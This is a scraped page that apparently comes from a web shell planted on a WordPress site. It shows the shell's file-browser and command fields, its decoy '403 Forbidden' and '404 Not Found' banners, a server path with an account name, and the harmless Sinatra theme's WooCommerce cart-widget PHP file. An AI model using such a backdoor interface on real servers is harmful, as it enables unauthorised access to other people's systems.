403 Forbidden


Disable Functions:
Path : /home4/promillz/www/website_dbb2e870/wp-content/themes/sinatra/woocommerce/cart/
File Upload :
Command :
Current File : /home4/promillz/www/website_dbb2e870/wp-content/themes/sinatra/woocommerce/cart/header-widget.php

<?php
/**
 * Header Cart Widget.
 *
 * @package Sinatra
 */

// Exit if accessed directly.
if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

$sinatra_cart_count = WC()->cart->get_cart_contents_count();
$sinatra_cart_icon  = apply_filters( 'sinatra_wc_cart_widget_icon', 'shopping-cart' );

?>
<a href="<?php echo esc_url( wc_get_cart_url() ); ?>" class="si-cart">
	<?php echo sinatra()->icons->get_svg( $sinatra_cart_icon ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>
	<?php if ( $sinatra_cart_count > 0 ) { ?>
		<span class="si-cart-count"><?php echo esc_html( $sinatra_cart_count ); ?></span>
	<?php } ?>
</a>

404 Not Found
[ LogOut ]